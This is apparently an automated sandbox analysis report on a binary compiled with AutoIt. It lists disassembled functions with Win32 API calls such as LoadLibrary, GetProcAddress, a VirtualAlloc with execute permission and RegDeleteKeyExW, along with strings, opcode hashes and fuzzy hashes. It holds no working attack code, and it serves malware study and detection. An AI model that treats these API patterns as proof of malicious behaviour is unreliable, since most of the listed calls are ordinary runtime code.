                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Long
                                                                                                                    • String ID: SysTreeView32
                                                                                                                    • API String ID: 847901565-1698111956
                                                                                                                    • Opcode ID: b0fe67f96e9220c9054a7842d850357a9d1692974e88490a80383013b94e3ad9
                                                                                                                    • Instruction ID: 6f859daf09b34ef47c9864e74e98c72dfb780745be0bacf17e418f17c15f9bd0
                                                                                                                    • Opcode Fuzzy Hash: b0fe67f96e9220c9054a7842d850357a9d1692974e88490a80383013b94e3ad9
                                                                                                                    • Instruction Fuzzy Hash: FF31CF71604206AFDB268E38DC81BEA77A9EF05324F218725F875A32E0D731ED618B50
                                                                                                                    Function 003373D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00337461
                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00337475
                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00337499
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window
                                                                                                                    • String ID: SysMonthCal32
                                                                                                                    • API String ID: 2326795674-1439706946
                                                                                                                    • Opcode ID: 862623aad15f077f0c191525ebbf58cc81db12e059b5ed875c1a30e62603af1d
                                                                                                                    • Instruction ID: 4401d3b4b4bc91dd2d5500ca284164aa87e260b64c5d8cf4ca75c5aa7f86e873
                                                                                                                    • Opcode Fuzzy Hash: 862623aad15f077f0c191525ebbf58cc81db12e059b5ed875c1a30e62603af1d
                                                                                                                    • Instruction Fuzzy Hash: E621D372500218AFDF268F55CC86FEA3B69EF48724F120214FE556B1D0DA75BC90CBA0
                                                                                                                    Function 00337B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00337C4A
                                                                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00337C58
                                                                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00337C5F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$DestroyWindow
                                                                                                                    • String ID: msctls_updown32
                                                                                                                    • API String ID: 4014797782-2298589950
                                                                                                                    • Opcode ID: a34ccd8b922462f29a3a8e353063d3c7873208893b0113e77c687f2f9aac0121
                                                                                                                    • Instruction ID: 51c21ec7431ac8ec7d7c30a61b3e77caea1a3e16cd028edc9eb08759f43e1a86
                                                                                                                    • Opcode Fuzzy Hash: a34ccd8b922462f29a3a8e353063d3c7873208893b0113e77c687f2f9aac0121
                                                                                                                    • Instruction Fuzzy Hash: 60218EB5604209AFDB22DF24DCC1DA737ECEF4A3A4F550059FA059B3A1CB71EC518A60
                                                                                                                    Function 00336CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00336D3B
                                                                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00336D4B
                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00336D70
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$MoveWindow
                                                                                                                    • String ID: Listbox
                                                                                                                    • API String ID: 3315199576-2633736733
                                                                                                                    • Opcode ID: ddfa07ff37c70b5c9e7a768f1d456b71f333be3c2e7c60780c5fa23d571d8562
                                                                                                                    • Instruction ID: 541d7e8ec1441916d1cd97c265395be2acf3dd44d6c9dde571638af1755dc120
                                                                                                                    • Opcode Fuzzy Hash: ddfa07ff37c70b5c9e7a768f1d456b71f333be3c2e7c60780c5fa23d571d8562
                                                                                                                    • Instruction Fuzzy Hash: 95215032610118BFEF168F54DC86EAB3BAEEB89750F51C128FA459B1A0C6719C519BA0
                                                                                                                    Function 003239E9 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __snwprintf.LIBCMT ref: 00323A66
                                                                                                                      • Part of subcall function 002B7DE1: _memmove.LIBCMT ref: 002B7E22
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __snwprintf_memmove
                                                                                                                    • String ID: , $$AUTOITCALLVARIABLE%d$%4
                                                                                                                    • API String ID: 3506404897-4045604893
                                                                                                                    • Opcode ID: c0c574cae269a6a2d97a76235a1fdad52760cbd60b8b3245ee91d9f6f58cd915
                                                                                                                    • Instruction ID: 5fa922a508349572e8c3c4c809f820e0f22fa40adc4ea168a66f759ed2dd060e
                                                                                                                    • Opcode Fuzzy Hash: c0c574cae269a6a2d97a76235a1fdad52760cbd60b8b3245ee91d9f6f58cd915
                                                                                                                    • Instruction Fuzzy Hash: 19219330A10119AFCF12EF64DC82EEE77B9AF48340F404469F555AB185DB34EA55CF61
                                                                                                                    Function 0033770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00337772
                                                                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00337787
                                                                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00337794
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend
                                                                                                                    • String ID: msctls_trackbar32
                                                                                                                    • API String ID: 3850602802-1010561917
                                                                                                                    • Opcode ID: 30efdd242f70211bd5f68a362f2ad1bf3f2dc8bd0882863b919b8545791292ac
                                                                                                                    • Instruction ID: 655edf281cfa9eb8806618a8d71d7f206b31f449c1bd1a73f6986e6505221a7c
                                                                                                                    • Opcode Fuzzy Hash: 30efdd242f70211bd5f68a362f2ad1bf3f2dc8bd0882863b919b8545791292ac
                                                                                                                    • Instruction Fuzzy Hash: 20113A72200208BFEF355F60CC41FE7776CEF89B54F024118F64196090C272E811CB10
                                                                                                                    Function 002D6B71 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __calloc_crt
                                                                                                                    • String ID: 6$@B7
                                                                                                                    • API String ID: 3494438863-1161358885
                                                                                                                    • Opcode ID: 0f1858a5d69d5155ba0b0d624fbb9fb422f45fa8686f1262fa371a4ae77c6e8a
                                                                                                                    • Instruction ID: 6009eabde4a23363e85c6ea13d0cc4b2ec9f9ce61d050199e2df95a09db85571
                                                                                                                    • Opcode Fuzzy Hash: 0f1858a5d69d5155ba0b0d624fbb9fb422f45fa8686f1262fa371a4ae77c6e8a
                                                                                                                    • Instruction Fuzzy Hash: 56F06879628A128BF7798F69BC55B566799E700734F500817E104EE391FBF08CD5CAC4
                                                                                                                    Function 002D9B79 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __lock.LIBCMT ref: 002D9B94
                                                                                                                      • Part of subcall function 002D9C0B: __mtinitlocknum.LIBCMT ref: 002D9C1D
                                                                                                                      • Part of subcall function 002D9C0B: EnterCriticalSection.KERNEL32(00000000,?,002D9A7C,0000000D), ref: 002D9C36
                                                                                                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 002D9BA4
                                                                                                                      • Part of subcall function 002D9100: ___addlocaleref.LIBCMT ref: 002D911C
                                                                                                                      • Part of subcall function 002D9100: ___removelocaleref.LIBCMT ref: 002D9127
                                                                                                                      • Part of subcall function 002D9100: ___freetlocinfo.LIBCMT ref: 002D913B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
                                                                                                                    • String ID: 86$86
                                                                                                                    • API String ID: 547918592-4260956243
                                                                                                                    • Opcode ID: 2b3cf9a8a3736bf4c5156167610713d384d55932904609a840633c088a8358d1
                                                                                                                    • Instruction ID: ed952468dcd14b71a3d07d0021f32599f29d61b7907f710928dd3bae0c47ac3e
                                                                                                                    • Opcode Fuzzy Hash: 2b3cf9a8a3736bf4c5156167610713d384d55932904609a840633c088a8358d1
                                                                                                                    • Instruction Fuzzy Hash: 72E08C3596B301AAEA12FBA46903B9C26549B00B35F30815BF089663C5CDF50C95CE1B
                                                                                                                    Function 002B4C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,002B4B83,?), ref: 002B4C44
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 002B4C56
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                    • API String ID: 2574300362-1355242751
                                                                                                                    • Opcode ID: ecfc182f9d98e7f330dc83b0c2229404b5103647bc74269682186d93d6bea496
                                                                                                                    • Instruction ID: 046534c31e76e34d12f1d47f4c4034aff53d93eaafa2ddcd17ed8b7c48074357
                                                                                                                    • Opcode Fuzzy Hash: ecfc182f9d98e7f330dc83b0c2229404b5103647bc74269682186d93d6bea496
                                                                                                                    • Instruction Fuzzy Hash: FED01270D10713CFD7216F31D98968677D8AF05791F51C83AD997D6165E670D480C650
                                                                                                                    Function 002B4C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,002B4BD0,?,002B4DEF,?,003752F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 002B4C11
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 002B4C23
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                    • API String ID: 2574300362-3689287502
                                                                                                                    • Opcode ID: 621c09ba51c47320361eb6ff01510f92fd0cf456c0532c882a1b45b2df2902e2
                                                                                                                    • Instruction ID: fedd4e178527a12498ac32fccdde5c77b6f30eb8dc4a5319df9ae6e217f7149f
                                                                                                                    • Opcode Fuzzy Hash: 621c09ba51c47320361eb6ff01510f92fd0cf456c0532c882a1b45b2df2902e2
                                                                                                                    • Instruction Fuzzy Hash: 40D0EC70911713CFD7216F71D988686BAD9AF09B91F51883AD886D6161E6B0D4808650
                                                                                                                    Function 00330DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00331039), ref: 00330DF5
                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00330E07
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                    • API String ID: 2574300362-4033151799
                                                                                                                    • Opcode ID: 183f2a249ed6797f230d5acec495e625139697d5b3fb8926e2ab6d0c1cef9924
                                                                                                                    • Instruction ID: b89276d6d17be6b68794ca36ec9e2c479d95dfe85090dc41182b2e87be9b7051
                                                                                                                    • Opcode Fuzzy Hash: 183f2a249ed6797f230d5acec495e625139697d5b3fb8926e2ab6d0c1cef9924
                                                                                                                    • Instruction Fuzzy Hash: 38D0C730A00B23CFC7268F72D888383B2E8AF02342F02CC3ED582C2160E6B0D890CA40
                                                                                                                    Function 003290E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00328CF4,?,0033F910), ref: 003290EE
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00329100
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                    • API String ID: 2574300362-199464113
                                                                                                                    • Opcode ID: 6dca49fbb01d9e1f973e87e1f522635ba781e58d19bf320911b0883f95941ec4
                                                                                                                    • Instruction ID: 7ab9fa631fadc12498da9d2c4ffa4acb2dbfd548c08eb5baba511b6a3cc984be
                                                                                                                    • Opcode Fuzzy Hash: 6dca49fbb01d9e1f973e87e1f522635ba781e58d19bf320911b0883f95941ec4
                                                                                                                    • Instruction Fuzzy Hash: E6D01774D50723CFDB229F32E898646B6E8AF15351F53C83AD886D65A4EA70D880CA90
                                                                                                                    Function 002F1714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LocalTime__swprintf
                                                                                                                    • String ID: %.3d$WIN_XPe
                                                                                                                    • API String ID: 2070861257-2409531811
                                                                                                                    • Opcode ID: c8a3c51dd080324c037f5c44e54ebbef2d668e2684bac7f260c6bea1750e08c6
                                                                                                                    • Instruction ID: 0e81d9964d42ce5093635c289a8df4aea5dd8ddabf86a6e3783abd5557055e14
                                                                                                                    • Opcode Fuzzy Hash: c8a3c51dd080324c037f5c44e54ebbef2d668e2684bac7f260c6bea1750e08c6
                                                                                                                    • Instruction Fuzzy Hash: B1D01271C3410CEAC705A7919989CF9F37CAB19391FA00472F60AD2040E3B29B74DA21
                                                                                                                    Function 0030717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2a761b91e7726c5a93b929b05180a17ff3bc0ffa7182655dfe7f3883b7dcbf8c
                                                                                                                    • Instruction ID: 56142b598f2fb5a1ff28e77a0ef87b56fab18c51c50d683807f938cf2b36bffd
                                                                                                                    • Opcode Fuzzy Hash: 2a761b91e7726c5a93b929b05180a17ff3bc0ffa7182655dfe7f3883b7dcbf8c
                                                                                                                    • Instruction Fuzzy Hash: 1DC19F74E05216EFDB15CFA5C894EAEBBB9FF48300B158598E805EB291D730ED81DB90
                                                                                                                    Function 0032E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 0032E0BE
                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 0032E101
                                                                                                                      • Part of subcall function 0032D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0032D7C5
                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0032E301
                                                                                                                    • _memmove.LIBCMT ref: 0032E314
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3659485706-0
                                                                                                                    • Opcode ID: 8f5483d65f5d3593e12e9fd0e06e7c537b0e824620a3cba2840a23e11bde292f
                                                                                                                    • Instruction ID: 085f78a09dd75fe3cc5247ee3cd13424988296796d9f12428d55d92d80b5e7c4
                                                                                                                    • Opcode Fuzzy Hash: 8f5483d65f5d3593e12e9fd0e06e7c537b0e824620a3cba2840a23e11bde292f
                                                                                                                    • Instruction Fuzzy Hash: 5FC156716083119FC705DF28C481A6ABBE4FF89354F14896EF89A9B351D730E946CF82
